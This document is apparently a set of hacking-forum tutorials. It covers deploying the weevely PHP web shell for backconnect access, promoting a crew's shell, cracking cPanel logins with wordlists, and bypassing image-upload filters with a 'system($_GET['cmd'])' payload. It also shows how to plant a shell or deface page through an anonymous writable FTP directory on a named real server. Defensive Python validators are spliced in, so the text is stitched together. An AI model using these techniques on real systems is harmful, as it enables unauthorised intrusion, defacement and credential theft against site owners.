Backconnect is usually used for a server that sits behind a proxy or is closed off by a firewall, so it cannot be connected to remotely. So one trick is to reverse the connection, which connects from the server to your computer.
1- In my case, I already have a vulnerable site and I am able to upload a shell. But, after a few seconds accessing the server through the shell, the connection was stopped and it says "Access Denied"
2- So, to bypass this, I will try to access the server again by backconnect using weevely
3- Firstly, open up Command Prompt and type in:
cd\
cd \weevely\
4- Now, to execute the weevely.py, type in this command:
weevely.py
or
C:\python27\python.exe weevely.py
5- Alright, now we are going to generate a stealth shell with a password. Type in this command:
weevely.py generate pass123
or
C:\python27\python.exe weevely.py generate pass123
6- You can rename weevely.php to anything you like. Okay, now upload weevely.py into the site
7- If you access the weevely.php through the web browser, it will show a blank page, but it doesn't mean it failed.
Weevely v1.1
Weevely is a stealth PHP web shell that provides a telnet or netcat type console and lets you execute commands remotely. It is an essential tool for web application post exploitation, and can be used as a stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones. It is a built-in tool in BackTrack 5 and easy to install and use on Linux, but in this tutorial I will show you how to use this tool on the Windows platform.
How to install?
1- Download the Python interpreter, which will make your computer capable of running Python scripts. I'm using python2.7.5 on my machine, so I would recommend you use python2.7.5 too. If you have another version then it's fine too. Download the Python Windows installer from the following url and install it on your Windows machine. Download
2- Download weevely from the following url. Extract it, enter its folder through cmd and try to execute it by writing "weevely.py" on the command prompt; you will get an error. So let's fix this error and make this work on Windows. Download
3- Now download Python setuptools from the following url and extract it. Download
4- Now press "WINDOWS Button + R"; it will open the Windows run box for you. There type cmd and press enter. Windows cmd will open before you.
5- Now use cd command to enter to your setup-tools directory i.e.
cd setuptools-0.9.8
6- Now run this command:
setup.py install
Note: sometimes after Python interpreter installation, Windows does not associate your .py files with the Python interpreter. In such a scenario, you can give the path of the Python interpreter to execute the setup.py file, and the command above will be modified like this:
C:\Python27\python.exe setup.py install
7- It will install Python setuptools, and a directory named "Scripts" will be created in your Python installation directory. For the default installation path, this newly created directory is C:\Python27\Scripts.
8- Now enter the "C:\Python27\Scripts" directory and run easy_install.exe to install pip, as I did below.
cd C:\Python27\Scripts
easy_install.exe pip
9- Now inside the same directory, install these two libraries, pyreadline and pyyaml, with pip:
pip install pyreadline pyyaml
10- Now everything is ready, just enter in weevely directory and execute it
K3RAMA7 Shell was recoded from Shell B374K and K2LL3D, so this is the result of the combination of two famous shells. This shell is named K3RAMA7 because it was recoded and rearranged by Keramat Durjana, the new leader of Black CyberSec Crew.
Today I'm going to show you how to crack Cpanel. :D
To crack Cpanel, you must have:
SHELLed Site
Cpanel Cracker (Download: Here)
List of Username and Password (Google It :P)
Or, if you're using our shell, there is already a cpanel cracker :P
Okay, let's get it started :)
Procedure
1- Upload cp.php into your shell.
2- Scroll down, click on User and you will get something like this,
You will get all the usernames of Cpanel
2- Copy the Username and Password from your dictionary and paste in the User and Pass column
3- Click start and wait for them to be cracked. :D
4- You will get the result in the next page.
DONE!
5. You can log in to the Cpanel at www.example.com:2082 :)
This is the first version of Black CyberSec Crew Shell. During the making of this shell, some of the BCC has helped me a lot especially Tiada Nama and Tony Mota. Thanks guys for your help and support ^_^
Wanna try our shell? Feel free to download it from HERE
This is the tutorial on uploading a shell by bypassing the image upload script!!
So someone you want to pwn has got a nice little option on their website to upload an image. Instead we're going to try to upload some PHP code so we can eventually own the box.
The following are ways to do this.
Firstly, just try to upload the shell. If this doesn't work, add GIF89a; to the top of your shell.php, for example: GIF89a;
Depending on what kind of file validation they are using, this may fool the server into thinking it's an image, since when it reads the file it finds the GIF header and assumes it's safe since it's an image.
The next way is to rename your shell to shell.php.jpg and try to upload it. This works because the is a null byte and the server should drop it and anything after it, but when you upload, it reads it as a .jpg and not a .php.
Another way you can fool the web server into thinking you're uploading an image instead of a PHP shell is to get Firefox and install the Tamper Data add-on, then click start tamper and upload your PHP shell, then tamper the data and change the Content-Type from 'application/octet-stream' to 'image/jpeg'. ^ self explanatory.
The final way I'm going to discuss is somewhat good.
Find yourself a copy of edjpgcom.exe "edjpgcom is a free Windows application that allows you to change (or add) a JPEG comment in a JPEG file." Usage: -- edjpgcom "filename.jpg" Now add this to the jpg comment since you wont be able to drop a whole shell in there due to limits etc. "; system($_GET['cmd']); echo "
"; ?> now rename your jpg to .php and upload. This works since the jpeg and all its attributes are still intact and it seems like a normal jpg to the server.
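Each trick above defeats a check that trusts something the uploader controls: the leading bytes, the filename, or the Content-Type header. The following Python validator is an added example, not code from the original post, showing server-side checks that reject all four cases; the function names and sample inputs are assumptions constructed for illustration.

```python
import os
import re
import secrets

# Allowlisted extensions mapped to the magic bytes a real file of that type starts with.
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# Extensions a web server may hand to an interpreter, wherever they sit in the name.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pl|py|cgi|asp|aspx|jsp)(\.|$)", re.I)
# A valid image header or JPEG comment can still carry PHP. This is a heuristic:
# short open tags are not covered, so re-encoding the image is the stronger control.
CODE_MARKERS = (b"<?php",)


def check_upload(filename, content, client_content_type=None):
    """Return (ok, reason). client_content_type is uploader-controlled and ignored."""
    if "\x00" in filename or "%00" in filename:
        return False, "null byte in filename"
    name = os.path.basename(filename.replace("\\", "/"))
    if SCRIPT_EXT.search(name):
        return False, "script extension in filename"
    ext = os.path.splitext(name)[1].lower()
    if ext not in MAGIC:
        return False, "extension not allowlisted"
    if not content.startswith(MAGIC[ext]):
        return False, "magic bytes do not match extension"
    lowered = content.lower()
    if any(marker in lowered for marker in CODE_MARKERS):
        return False, "embedded code marker"
    return True, "ok"


def storage_name(filename):
    """Server-generated name: the uploader never chooses the stored name."""
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(16) + ext
```

Storing accepted files under `storage_name()` in a directory the web server does not execute scripts from removes the remaining dependence on the heuristic marker scan.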
File Transfer Protocol (FTP) is a standard network protocol used to copy a file from one host to another over a TCP-based network, such as the Internet. FTP is built on a client-server architecture and utilizes separate control and data connections between the client and server. FTP users may authenticate themselves using a clear-text sign-in protocol but can connect anonymously if the server is configured to allow it.
So, if the FTP server does not allow anonymous login, then we have to bruteforce the FTP server using this tool, BRUTUS.
Tool for FTP bruteforcing:
Code:
http://downloads.z i d d u .com/downloadfile/12201510/brutus-aet2.zip.html
I will explain about the bruteforcer later.
So, if FTP allows the user in anonymously with writable directories permitted, then we can easily upload a shell or anything to the server.
I got a site here with the specified dork above, which allows "anonymous" access with a writable directory.
Code:
ftp.3gpp.org
First, get the Total Commander tool from here. Total Commander is user-friendly software with which you can transfer files with ease.
Just place the wincmd.key in the directory where Total Commander is installed (no need to click it to activate).
Now open Total Commander. It looks like this.
Then press Ctrl+N.
Then specify the host name. If the host name is http://www.3gpp.org, then put the host name as "ftp.3gpp.org"
Check the anonymous connection box (by default it's checked; if not, tick it) and click OK. Then you see a connect box which makes some connection through FTP.
Now you will see two sides like this. The left side ("ftp.3gpp.org") is the files of the server and the right side is all your PC files. Sometimes these sides may be interchanged.
Now right click and hold on any one of the server files.
And go to properties. You will see something like this.
I will say what it is. The first dr-xr-xr-x is about the permissions for that particular directory.
dr-xr-xr-x :
Position:   1     2     3      4        5     6      7        8     9      10
Class:      File  User Permissions      Group Permissions     Other Permissions
Field:      Type  Read  Write  Execute  Read  Write  Execute  Read  Write  Execute
Character:  d     r     w      x        r     w      x        r     w      x

12345678910
drwxrwxrwx
1234 is the file user permissions
1-type-d
2-read-r
3-write-w
4-execute-x
567 is the group permission
5-read-r
6-write-w
7-execute-x
89 10 is the other permissions
8-read-r
9-write-w
10-execute-x
Permissions in detail:http://www.comptechdoc.org/os/linux/usersguide/linux_ugfilesp.html
dr-xr-xr-x 1 owner group 0 Jan 17 15:41 Inbox:
So, the directory Inbox can be read and executed. We cannot write there.
Let's move into Inbox. Double click Inbox.
And right click and hold on any of the server files and go to properties. There you can notice that
drwxrwxrwx 1 owner group 0 Feb 8 19:44 RAN_WG4
Now the RAN_WG4 directory can be read and written. So, make a deface page or shell!!
Go into ran_wg4 by double clicking it. Go to drafts.
Now on the right side you can see ur PC files. Now just navigate to the deface page or shell in ur PC files and drag and drop the deface page or shell to the server files.
Then you will be prompted with a msg to confirm your update. Just click OK. Now your file is transferred.
goto http://ftp.3gpp.prg in your browser and navigate to inbox->ran_wg4->drafts->gtr.htl(which is newly copied)
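The permission strings explained above decide whether an anonymous FTP session can write to a directory. As an added example (not part of the original post), this Python code decodes the 10-character mode string and lists the entries that "other" can write to, which is the check an administrator would run against the listing of their own anonymous FTP area; the function names are assumptions and the sample lines are the two quoted on this page.

```python
TYPES = {"d": "directory", "-": "file", "l": "symlink"}


def parse_mode(mode):
    """Decode a 10-character mode string such as 'dr-xr-xr-x'."""
    if len(mode) != 10 or mode[0] not in TYPES:
        raise ValueError("unexpected mode string: %r" % mode)
    result = {"type": TYPES[mode[0]], "octal": 0}
    # Positions 2-4 are user, 5-7 group, 8-10 other (1-based, as in the table above).
    for name, start, shift in (("user", 1, 6), ("group", 4, 3), ("other", 7, 0)):
        r, w, x = mode[start:start + 3]
        can_exec = x in ("x", "s", "t")
        bits = (4 if r == "r" else 0) | (2 if w == "w" else 0) | (1 if can_exec else 0)
        result[name] = {"read": r == "r", "write": w == "w", "execute": can_exec}
        result["octal"] |= bits << shift
    return result


def world_writable(listing):
    """Return (name, octal string) for every entry that 'other' can write to."""
    findings = []
    for line in listing.splitlines():
        # Fields: mode links owner group size month day time name
        fields = line.split(None, 8)
        if len(fields) < 9:
            continue
        try:
            mode = parse_mode(fields[0])
        except ValueError:
            continue
        if mode["other"]["write"]:
            findings.append((fields[8], "%03o" % mode["octal"]))
    return findings


# The two listing lines quoted on this page.
SAMPLE = """dr-xr-xr-x 1 owner group 0 Jan 17 15:41 Inbox
drwxrwxrwx 1 owner group 0 Feb 8 19:44 RAN_WG4"""

if __name__ == "__main__":
    for name, octal in world_writable(SAMPLE):
        print("world-writable:", name, octal)
```

Any directory this reports inside an anonymous FTP root should have its "other" write bit removed or anonymous uploads disabled in the server configuration.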
If the FTP server did not allow access to anonymous login, then we have to bruteforce it using a bruteforcer tool. Normally the FTP server is secured. If u got luck then u can get the logins with the brutus tool.
Code:
http://downloads.z i d d u .com/downloadfile/12201510/brutus-aet2.zip.html
The tool will be detected as a hack tool by all antivirus!! It's not a virus. It's clean. If u want, run it in a virtual machine!!